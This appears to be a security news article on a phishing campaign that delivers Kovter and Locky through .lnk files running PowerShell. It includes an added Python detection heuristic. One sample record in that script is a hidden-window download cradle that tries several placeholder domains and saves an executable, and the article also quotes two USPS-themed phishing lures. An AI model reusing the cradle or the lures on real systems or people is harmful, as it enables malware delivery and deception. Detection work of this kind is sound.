Aggressive computer hackers are distributing a new email campaign that delivers both Kovter and Locky to their targets.
Kovter And Locky Delivered In A New Wave Of Malware Campaigns
Computer criminals are combining a new generation of scripts to install both Kovter and Locky on target hosts. A few months ago security researchers identified an emerging email campaign that distributed .lnk (Windows shortcut) files carrying a malicious script that installs the Locky ransomware. When the shortcut is opened it executes an embedded PowerShell script, which downloads the payload from a remote download site. A more complex version has now been discovered that delivers several malware families from an extended list of sites.
The new script uses no fewer than five different domains to try to download the payload. In addition to the Locky ransomware it also delivers Kovter. The script requests a specific location on each domain using a parameter value, and every hardcoded domain is tried in turn until the payload is successfully downloaded and installed. If the payload cannot be retrieved with one parameter value, the script retries with another. Multiple domains and this retry scheme are used to get past URL filtering that might otherwise block the infection.
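As an added illustration that is not part of the original article, the following Python script turns the behaviour described above into a detection heuristic and runs it over constructed process-creation records in the style of Sysmon Event ID 1. It scores PowerShell launched from the Windows shell (a double-clicked attachment), a download cradle in the command line, hidden-window switches, and, as the strongest signal, several distinct download hosts referenced by one command, which is the fallback-across-domains trait the article describes. The field names, hostnames, sample command lines and scoring weights are assumptions made for the example, not indicators from the campaign.

```python
import re
from urllib.parse import urlparse

# Download-cradle keywords. Each one also appears in legitimate admin scripts,
# so a marker only adds to the score together with the other signals below.
MARKER_RE = re.compile(
    r"\b(downloadfile|downloadstring|net\.webclient|invoke-webrequest|iwr|"
    r"start-bitstransfer|invoke-expression|iex)\b", re.IGNORECASE)
# Switches that hide the console or skip profile and execution-policy checks.
STEALTH_RE = re.compile(
    r"-(?:w|windowstyle)\s+hidden|-nop\b|-noprofile\b|"
    r"-(?:ep|executionpolicy)\s+bypass|-enc\b|-encodedcommand\b", re.IGNORECASE)
URL_RE = re.compile(r"https?://[^\s'\"(),;]+", re.IGNORECASE)

# Constructed sample records with assumed field names; not telemetry from the campaign.
SAMPLE_EVENTS = [
    {   # shortcut double-clicked in Explorer, three fallback hosts, hidden window
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": (
            'powershell.exe -NoP -W Hidden -c "$u=@('
            "'http://domain-a.example/get.php?q=1',"
            "'http://domain-b.example/get.php?q=1',"
            "'http://domain-c.example/get.php?q=1');"
            "foreach($x in $u){(New-Object Net.WebClient).DownloadFile($x,$env:TEMP+'\\p.exe')}\""),
    },
    {   # benign interactive use: nothing downloaded
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": 'powershell.exe -c "Get-Service | Where-Object Status -eq Running"',
    },
    {   # single-host download by a service: a cradle, but no fallback and no stealth
        "ParentImage": r"C:\Windows\System32\services.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": 'powershell.exe -c "Invoke-WebRequest https://updates.example/setup.msi -OutFile C:\\Temp\\setup.msi"',
    },
]


def basename(path):
    """Last component of a Windows or POSIX path, lower-cased."""
    return re.split(r"[\\/]", path)[-1].lower()


def distinct_hosts(command_line):
    """Distinct hostnames referenced by URLs in a command line."""
    hosts = set()
    for url in URL_RE.findall(command_line):
        host = urlparse(url).hostname
        if host:
            hosts.add(host.lower())
    return hosts


def analyze_event(event):
    """Score one process-creation record for the multi-host download pattern."""
    result = {"score": 0, "reasons": [], "hosts": set()}
    if basename(event.get("Image", "")) not in ("powershell.exe", "pwsh.exe"):
        return result
    cmd = event.get("CommandLine", "")
    markers = sorted({m.lower() for m in MARKER_RE.findall(cmd)})
    if markers:
        result["score"] += 2
        result["reasons"].append("download cradle: " + ", ".join(markers))
    switches = sorted({s.lower() for s in STEALTH_RE.findall(cmd)})
    if switches:
        result["score"] += 1
        result["reasons"].append("stealth switches: " + ", ".join(switches))
    hosts = distinct_hosts(cmd)
    result["hosts"] = hosts
    if len(hosts) >= 2:
        # Trying several domains until one answers is the trait the article describes.
        result["score"] += 3
        result["reasons"].append("fallback across %d download hosts" % len(hosts))
    if basename(event.get("ParentImage", "")) == "explorer.exe" and "$env:temp" in cmd.lower():
        result["score"] += 1
        result["reasons"].append("launched from explorer.exe and writes to the user temp directory")
    return result


def scan(events, threshold=4):
    """Return (index, result) for every event scoring at or above the threshold."""
    flagged = []
    for i, event in enumerate(events):
        result = analyze_event(event)
        if result["score"] >= threshold:
            flagged.append((i, result))
    return flagged


if __name__ == "__main__":
    for i, result in scan(SAMPLE_EVENTS):
        print("event %d score %d: %s" % (i, result["score"], "; ".join(result["reasons"])))
```

Only the first record crosses the threshold: the legitimate single-host download in the third record scores on the cradle keyword alone, which is why the host-count signal carries the most weight. In a real pipeline the records would come from the endpoint telemetry feed rather than the inline list.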
Sample Kovter And Locky Email Bearing Messages
As usual, the malicious scripts are delivered in email campaigns that rely on social engineering. Here is an example message that spoofs a USPS delivery notification:
Dear Roberto,
This is to confirm that your item has been shipped at January 24.
Review the document that is attached to this e-mail!
Thank you for your assistance in this matter, Marion Wooodard, USPS Mail Delivery Clerk.
Another sample message reads:
Dear Norma,
We can not deliver your parcel arrived at January 20.
Please check the attachment for details!
Best regards,
Wayne Christensen,
USPS Mail Delivery Clerk.
Once the downloaded Locky payload runs, its encryption engine starts and the target user's data is encrypted with a strong cipher. Depending on the Locky strain, a different extension may be appended to the encrypted files: Zepto, Odin, Thor, Aesir or Osiris.
For more information about this emerging threat you can read Microsoft’s detailed post.